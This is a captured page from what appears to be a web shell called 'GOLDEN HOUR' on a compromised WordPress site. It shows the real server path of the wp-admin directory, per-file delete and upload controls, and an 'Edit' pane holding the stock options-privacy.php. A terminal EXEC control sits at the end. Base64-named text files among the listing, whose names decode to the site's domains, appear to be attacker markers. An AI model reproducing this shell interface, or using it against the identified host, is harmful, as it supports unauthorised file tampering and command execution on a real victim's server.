GOLDEN HOUR
DIR: /home/vlabbdco/public_html/wp-admin
UP
UPLOAD
Name
Size
Action
about.php
32.8 KB
DEL
admin-ajax.php
4.72 KB
DEL
admin-footer.php
2.77 KB
DEL
admin-functions.php
406 B
DEL
admin-header.php
8.42 KB
DEL
admin-post.php
1.63 KB
DEL
admin.php
11.85 KB
DEL
async-upload.php
3.74 KB
DEL
authorize-application.php
9.62 KB
DEL
bWFpbC52bGFiYmQuY29t.txt
53 B
DEL
comment.php
11.15 KB
DEL
credits.php
13.07 KB
DEL
[ css ]
-
DEL
custom-background.php
416 B
DEL
custom-header.php
426 B
DEL
customize.php
10.07 KB
DEL
d3d3LnZsYWJiZC5jb206NDQz.txt
53 B
DEL
d3d3LnZsYWJiZC5jb20=.txt
53 B
DEL
dmxhYmJkLmNvbQ==.txt
53 B
DEL
dmxhYmJkLmNvbQ==a.txt
217 B
DEL
dmxhYmJkLmNvbTo0NDM=.txt
53 B
DEL
edit-comments.php
13.43 KB
DEL
edit-form-advanced.php
28.29 KB
DEL
edit-form-blocks.php
14.68 KB
DEL
edit-form-comment.php
7.96 KB
DEL
edit-link-form.php
6.09 KB
DEL
edit-tag-form.php
9.89 KB
DEL
edit-tags.php
21.43 KB
DEL
edit.php
18.75 KB
DEL
erase-personal-data.php
3.16 KB
DEL
error_log
44.55 KB
DEL
export-personal-data.php
3.13 KB
DEL
export.php
10.71 KB
DEL
freedoms.php
13.76 KB
DEL
[ images ]
-
DEL
import.php
7.35 KB
DEL
[ includes ]
-
DEL
index.php
7 KB
DEL
install-helper.php
5.89 KB
DEL
install.php
16.51 KB
DEL
[ js ]
-
DEL
link-add.php
711 B
DEL
link-manager.php
4.12 KB
DEL
link-parse-opml.php
2.59 KB
DEL
link.php
2.67 KB
DEL
load-scripts.php
1.65 KB
DEL
load-styles.php
2.25 KB
DEL
[ maint ]
-
DEL
media-new.php
3.12 KB
DEL
media-upload.php
3.4 KB
DEL
media.php
5.47 KB
DEL
menu-header.php
9.68 KB
DEL
menu.php
14.19 KB
DEL
moderation.php
307 B
DEL
ms-admin.php
196 B
DEL
ms-delete-site.php
4.15 KB
DEL
ms-edit.php
216 B
DEL
ms-options.php
223 B
DEL
ms-sites.php
215 B
DEL
ms-themes.php
217 B
DEL
ms-upgrade-network.php
219 B
DEL
ms-users.php
215 B
DEL
my-sites.php
4.54 KB
DEL
nav-menus.php
43.75 KB
DEL
[ network ]
-
DEL
network.php
5.25 KB
DEL
options-discussion.php
15.08 KB
DEL
options-general.php
14.63 KB
DEL
options-head.php
492 B
DEL
options-media.php
6.15 KB
DEL
options-permalink.php
18.82 KB
DEL
options-privacy.php
7.89 KB
DEL
options-reading.php
9.63 KB
DEL
options-writing.php
8.42 KB
DEL
options.php
12.48 KB
DEL
plugin-editor.php
13.01 KB
DEL
plugin-install.php
6.21 KB
DEL
plugins.php
28.48 KB
DEL
post-new.php
2.64 KB
DEL
post.php
9.84 KB
DEL
press-this.php
2.33 KB
DEL
privacy-policy-guide.php
841 B
DEL
privacy.php
11.67 KB
DEL
profile.php
283 B
DEL
revision.php
5.4 KB
DEL
setup-config.php
15.44 KB
DEL
site-health-info.php
5.65 KB
DEL
site-health.php
5.25 KB
DEL
term.php
2.2 KB
DEL
theme-editor.php
14.68 KB
DEL
theme-install.php
21.48 KB
DEL
themes.php
43.78 KB
DEL
tools.php
3.37 KB
DEL
update-core.php
42.44 KB
DEL
update.php
12.59 KB
DEL
upgrade-functions.php
341 B
DEL
upgrade.php
5.47 KB
DEL
upload.php
13.67 KB
DEL
[ user ]
-
DEL
user-edit.php
32.71 KB
DEL
user-new.php
23.41 KB
DEL
users.php
19.45 KB
DEL
widgets.php
19.64 KB
DEL
Edit: options-privacy.php
<?php /** * Privacy Settings Screen. * * @package WordPress * @subpackage Administration */ /** WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; if ( ! current_user_can( 'manage_privacy_options' ) ) { wp_die( __( 'Sorry, you are not allowed to manage privacy options on this site.' ) ); } $action = isset( $_POST['action'] ) ? $_POST['action'] : ''; if ( ! empty( $action ) ) { check_admin_referer( $action ); if ( 'set-privacy-page' === $action ) { $privacy_policy_page_id = isset( $_POST['page_for_privacy_policy'] ) ? (int) $_POST['page_for_privacy_policy'] : 0; update_option( 'wp_page_for_privacy_policy', $privacy_policy_page_id ); $privacy_page_updated_message = __( 'Privacy Policy page updated successfully.' ); if ( $privacy_policy_page_id ) { /* * Don't always link to the menu customizer: * * - Unpublished pages can't be selected by default. * - `WP_Customize_Nav_Menus::__construct()` checks the user's capabilities. * - Themes might not "officially" support menus. */ if ( 'publish' === get_post_status( $privacy_policy_page_id ) && current_user_can( 'edit_theme_options' ) && current_theme_supports( 'menus' ) ) { $privacy_page_updated_message = sprintf( /* translators: %s: URL to Customizer -> Menus. */ __( 'Privacy Policy page setting updated successfully. Remember to <a href="%s">update your menus</a>!' ), esc_url( add_query_arg( 'autofocus[panel]', 'nav_menus', admin_url( 'customize.php' ) ) ) ); } } add_settings_error( 'page_for_privacy_policy', 'page_for_privacy_policy', $privacy_page_updated_message, 'success' ); } elseif ( 'create-privacy-page' === $action ) { if ( ! class_exists( 'WP_Privacy_Policy_Content' ) ) { require_once ABSPATH . 'wp-admin/includes/class-wp-privacy-policy-content.php'; } $privacy_policy_page_content = WP_Privacy_Policy_Content::get_default_content(); $privacy_policy_page_id = wp_insert_post( array( 'post_title' => __( 'Privacy Policy' ), 'post_status' => 'draft', 'post_type' => 'page', 'post_content' => $privacy_policy_page_content, ), true ); if ( is_wp_error( $privacy_policy_page_id ) ) { add_settings_error( 'page_for_privacy_policy', 'page_for_privacy_policy', __( 'Unable to create a Privacy Policy page.' ), 'error' ); } else { update_option( 'wp_page_for_privacy_policy', $privacy_policy_page_id ); wp_redirect( admin_url( 'post.php?post=' . $privacy_policy_page_id . '&action=edit' ) ); exit; } } } // If a Privacy Policy page ID is available, make sure the page actually exists. If not, display an error. $privacy_policy_page_exists = false; $privacy_policy_page_id = (int) get_option( 'wp_page_for_privacy_policy' ); if ( ! empty( $privacy_policy_page_id ) ) { $privacy_policy_page = get_post( $privacy_policy_page_id ); if ( ! $privacy_policy_page instanceof WP_Post ) { add_settings_error( 'page_for_privacy_policy', 'page_for_privacy_policy', __( 'The currently selected Privacy Policy page does not exist. Please create or select a new page.' ), 'error' ); } else { if ( 'trash' === $privacy_policy_page->post_status ) { add_settings_error( 'page_for_privacy_policy', 'page_for_privacy_policy', sprintf( /* translators: %s: URL to Pages Trash. */ __( 'The currently selected Privacy Policy page is in the Trash. Please create or select a new Privacy Policy page or <a href="%s">restore the current page</a>.' ), 'edit.php?post_status=trash&post_type=page' ), 'error' ); } else { $privacy_policy_page_exists = true; } } } $title = __( 'Privacy Settings' ); $parent_file = 'options-general.php'; require_once ABSPATH . 'wp-admin/admin-header.php'; ?> <div class="wrap"> <h1><?php echo $title; ?></h1> <h2><?php _e( 'Privacy Policy Page' ); ?></h2> <p> <?php _e( 'As a website owner, you may need to follow national or international privacy laws. For example, you may need to create and display a Privacy Policy.' ); ?> <?php _e( 'If you already have a Privacy Policy page, please select it below. If not, please create one.' ); ?> </p> <p> <?php _e( 'The new page will include help and suggestions for your Privacy Policy.' ); ?> <?php _e( 'However, it is your responsibility to use those resources correctly, to provide the information that your Privacy Policy requires, and to keep that information current and accurate.' ); ?> </p> <p> <?php _e( 'After your Privacy Policy page is set, we suggest that you edit it.' ); ?> <?php _e( 'We would also suggest reviewing your Privacy Policy from time to time, especially after installing or updating any themes or plugins. There may be changes or new suggested information for you to consider adding to your policy.' ); ?> </p> <?php if ( $privacy_policy_page_exists ) { $edit_href = add_query_arg( array( 'post' => $privacy_policy_page_id, 'action' => 'edit', ), admin_url( 'post.php' ) ); $view_href = get_permalink( $privacy_policy_page_id ); ?> <p class="tools-privacy-edit"><strong> <?php if ( 'publish' === get_post_status( $privacy_policy_page_id ) ) { printf( /* translators: 1: URL to edit Privacy Policy page, 2: URL to view Privacy Policy page. */ __( '<a href="%1$s">Edit</a> or <a href="%2$s">view</a> your Privacy Policy page content.' ), esc_url( $edit_href ), esc_url( $view_href ) ); } else { printf( /* translators: 1: URL to edit Privacy Policy page, 2: URL to preview Privacy Policy page. */ __( '<a href="%1$s">Edit</a> or <a href="%2$s">preview</a> your Privacy Policy page content.' ), esc_url( $edit_href ), esc_url( $view_href ) ); } ?> </strong></p> <?php } ?> <p> <?php printf( /* translators: 1: Privacy Policy guide URL, 2: Additional link attributes, 3: Accessibility text. */ __( 'Need help putting together your new Privacy Policy page? <a href="%1$s" %2$s>Check out our guide%3$s</a> for recommendations on what content to include, along with policies suggested by your plugins and theme.' ), esc_url( admin_url( 'privacy-policy-guide.php' ) ), '', '' ); ?> </p> <hr> <table class="form-table tools-privacy-policy-page" role="presentation"> <tr> <th scope="row"> <label for="page_for_privacy_policy"> <?php if ( $privacy_policy_page_exists ) { _e( 'Change your Privacy Policy page' ); } else { _e( 'Select a Privacy Policy page' ); } ?> </label> </th> <td> <?php $has_pages = (bool) get_posts( array( 'post_type' => 'page', 'posts_per_page' => 1, 'post_status' => array( 'publish', 'draft', ), ) ); if ( $has_pages ) : ?> <form method="post" action=""> <input type="hidden" name="action" value="set-privacy-page" /> <?php wp_dropdown_pages( array( 'name' => 'page_for_privacy_policy', 'show_option_none' => __( '— Select —' ), 'option_none_value' => '0', 'selected' => $privacy_policy_page_id, 'post_status' => array( 'draft', 'publish' ), ) ); wp_nonce_field( 'set-privacy-page' ); submit_button( __( 'Use This Page' ), 'primary', 'submit', false, array( 'id' => 'set-page' ) ); ?> </form> <?php endif; ?> <form class="wp-create-privacy-page" method="post" action=""> <input type="hidden" name="action" value="create-privacy-page" /> <span> <?php if ( $has_pages ) { _e( 'Or' ); } else { _e( 'There are no pages.' ); } ?> </span> <?php wp_nonce_field( 'create-privacy-page' ); submit_button( __( 'Create New Page' ), 'primary', 'submit', false, array( 'id' => 'create-page' ) ); ?> </form> </td> </tr> </table> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php';
SAVE FILE
TERMINAL
EXEC